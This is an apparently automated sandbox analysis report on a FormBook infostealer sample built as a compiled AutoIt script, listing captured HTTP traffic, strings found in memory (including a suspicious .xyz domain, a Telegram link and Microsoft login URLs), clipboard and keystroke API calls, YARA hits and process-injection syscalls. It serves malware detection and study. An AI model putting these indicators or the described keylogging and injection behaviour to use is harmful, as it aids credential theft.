fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9\|F3"S+i@O]OH,2hweWBO6}#
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 07:00:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M8S1SGNAIHWoQmuM0BGNvaDGzILfTrbH0TceUhTHWNuiFzJGxm0qUaD%2F4RPWBdtbgxHzym%2BP0RqSGWouNIW6RDeYY80cd%2Bha7jDZs8Y0YysiWTVhWfwzSWOaNLZZabfJoj5LMhp0fN2G"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9003076b2b39728f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1793&rtt_var=896&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1764&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9\|F3"S+i@O]OH,2hwe
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 07:00:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fxmlABdynXjqxSTc8WVtoEPKymM%2FVauGvDaKuwnl99RvVCfevwqCt5FSSkWxD05f7MU2YMJo7kmM6eFNYvkj%2FzyB3xJlduw5Ff96B0zDO25MtVMbPtq%2FrJVGDteliM3LcWUG4aEa%2BCGT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9003077af9877ca2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1786&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=455&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Hel
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:00:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy\|zzyJ)[ J7F+[Sps#~x'$0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:00:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy\|zzyJ)[ J7F+[Sps#~x'$0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:00:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy\|zzyJ)[ J7F+[Sps#~x'$0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:00:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 07:01:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 07:01:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: msdt.exe, 00000005.00000002.3913942435.00000000054DC000.00000004.10000000.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000007.00000002.3913197510.0000000003CFC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.gmx.net/produkte/homepage-mail/homepage-parken/
Source: HSGhOUKfqFw.exe, 00000007.00000002.3915092997.000000000575F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.mindfulsteps.xyz
Source: HSGhOUKfqFw.exe, 00000007.00000002.3915092997.000000000575F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.mindfulsteps.xyz/8hma/
Source: msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msdt.exe, 00000005.00000002.3911543722.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: msdt.exe, 00000005.00000002.3911543722.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: msdt.exe, 00000005.00000002.3911543722.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000002.3911543722.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: msdt.exe, 00000005.00000002.3911543722.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: msdt.exe, 00000005.00000002.3911543722.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: msdt.exe, 00000005.00000002.3911543722.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: msdt.exe, 00000005.00000003.2674720496.0000000007516000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: firefox.exe, 00000008.00000002.2786008912.000000003CE64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://t.me/NVission
Source: msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C44164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00C44164

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C44164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00C44164

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C43F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00C43F66

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C3001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00C3001C

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C5CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00C5CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3913013738.0000000004080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2492972011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3912887466.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3915092997.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2493551934.0000000003400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3911338713.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2494167980.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3913163573.0000000004220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00BD3B3A
Source: rACq8Eaix6.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: rACq8Eaix6.exe, 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6cd7121b-0
Source: rACq8Eaix6.exe, 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_a4b45998-b
Source: rACq8Eaix6.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_546786f8-e
Source: rACq8Eaix6.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_7bf550d0-9

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C5E3 NtClose,	2_2_0042C5E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572B60 NtClose,LdrInitializeThunk,	2_2_03572B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03572DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035735C0 NtCreateMutant,LdrInitializeThunk,	2_2_035735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03574340 NtSetContextThread,	2_2_03574340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03574650 NtSuspendThread,	2_2_03574650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572BF0 NtAllocateVirtualMemory,	2_2_03572BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572BE0 NtQueryValueKey,	2_2_03572BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572B80 NtQueryInformationFile,	2_2_03572B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572BA0 NtEnumerateValueKey,	2_2_03572BA0
